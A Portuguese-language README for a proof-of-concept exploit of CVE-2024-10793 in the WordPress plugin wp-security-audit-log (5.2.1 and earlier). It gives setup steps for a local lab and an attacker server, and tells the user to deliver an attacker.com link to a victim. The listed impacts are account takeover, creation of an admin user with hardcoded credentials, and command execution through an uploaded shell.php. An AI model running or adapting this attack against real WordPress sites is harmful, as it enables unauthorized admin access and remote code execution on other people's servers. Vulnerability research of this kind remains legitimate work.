
Exploit de prova de conceito para CVE-2024-10793 visando o plugin WordPress wp-security-audit-log. Demonstra a tomada de conta, criação de usuários privilegiados, upload de shell e manipulação de administrador através de requisições HTTP manipuladas.
Adicione estas linhas ao seu arquivo hosts:
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
Inicie o Wordpress usando docker:
$ sudo systemctl start docker
$ sudo docker-compose up -d
Abra http://goodcms.lab:2121 e siga os passos de instalação do wordpress. Instale o wp-security-audit-log.5.2.1 ou versões anteriores no wordpress.
Inicie o servidor do atacante:
$ php -S 0:9091 -t ./exploit
Entregue http://attacker.com à vítima & Bingo!
Impactos do Exploit:

Account Takeover & Criar Usuário Privilegiado Poc: Credenciais do atacante após o exploit: { email: [email protected], username: amin, password: 123456 } (Você pode alterar no código xpl.js.)
Executar Comando Shell: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
